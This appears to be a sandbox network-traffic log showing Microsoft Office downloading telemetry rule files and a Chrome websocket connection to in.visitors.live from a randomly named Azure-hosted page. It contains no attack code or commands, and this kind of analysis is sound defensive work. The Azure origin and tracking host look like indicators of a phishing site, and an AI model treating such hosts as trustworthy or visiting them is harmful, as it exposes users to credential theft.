                                                        Date: Thu, 28 Nov 2024 12:35:29 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 2160
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                        ETag: "0x8DC582BA3B95D81"
                                                        x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123529Z-174f7845968qj8jrhC1EWRh41s0000000yfg000000000b73
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:30 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        38192.168.2.44985213.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:31 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:32 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:31 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 474
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                        ETag: "0x8DC582B9964B277"
                                                        x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123531Z-174f7845968swgbqhC1EWRmnb40000000yng000000003pe3
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:32 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        39192.168.2.44985113.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:31 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:32 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:31 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 408
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                        ETag: "0x8DC582BB56D3AFB"
                                                        x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123531Z-174f7845968kdththC1EWRzvxn0000000apg00000000ad76
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:32 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        40192.168.2.44985513.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:31 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:32 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:31 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 632
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                        ETag: "0x8DC582BB6E3779E"
                                                        x-ms-request-id: 1acdd965-601e-005c-618a-40f06f000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123531Z-174f7845968cdxdrhC1EWRg0en0000000yb0000000007t7k
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:32 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        41192.168.2.44985313.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:31 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:32 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:32 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 415
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                        ETag: "0x8DC582B9F6F3512"
                                                        x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123532Z-174f7845968cpnpfhC1EWR3afc0000000y30000000004smn
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:32 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        42192.168.2.44985413.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:32 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:33 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:33 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 471
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                        ETag: "0x8DC582BB10C598B"
                                                        x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123533Z-174f7845968ljs8phC1EWRe6en0000000y9g000000004yue
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:33 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        43192.168.2.44985613.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:33 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:34 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:34 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 467
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                        ETag: "0x8DC582BA6C038BC"
                                                        x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123534Z-174f784596886s2bhC1EWR743w0000000yg0000000004trh
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:34 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        44192.168.2.44985713.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:34 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:34 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:34 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 407
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                        ETag: "0x8DC582BBAD04B7B"
                                                        x-ms-request-id: ed9dfa2a-401e-0015-7891-3f0e8d000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123534Z-174f7845968jrjrxhC1EWRmmrs0000000yf0000000009c0n
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:34 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        45192.168.2.44985913.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:34 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:34 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:34 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 486
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                        ETag: "0x8DC582BB344914B"
                                                        x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123534Z-174f7845968zgtf6hC1EWRqd8s0000000reg000000002z0x
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:34 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.44986235.201.124.94435796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:34 UTC554OUTGET /socket.io/?EIO=3&transport=websocket HTTP/1.1
                                                        Host: in.visitors.live
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://ddbsodvnnadewe.z1.web.core.windows.net
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: ZTOfK3prcbA3C0nzoINE6g==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2024-11-28 12:35:35 UTC218INHTTP/1.1 400 Bad Request
                                                        Content-Type: application/json
                                                        Date: Thu, 28 Nov 2024 12:35:35 GMT
                                                        Via: 1.1 google
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2024-11-28 12:35:35 UTC45INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        47192.168.2.44986313.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:35 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:36 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:36 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 486
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                        ETag: "0x8DC582B9018290B"
                                                        x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123536Z-174f7845968jrjrxhC1EWRmmrs0000000yh00000000070fa
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:36 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        48192.168.2.44986413.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:36 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:36 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:36 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 407
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                        ETag: "0x8DC582B9698189B"
                                                        x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123536Z-174f7845968zgtf6hC1EWRqd8s0000000rd0000000005489
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
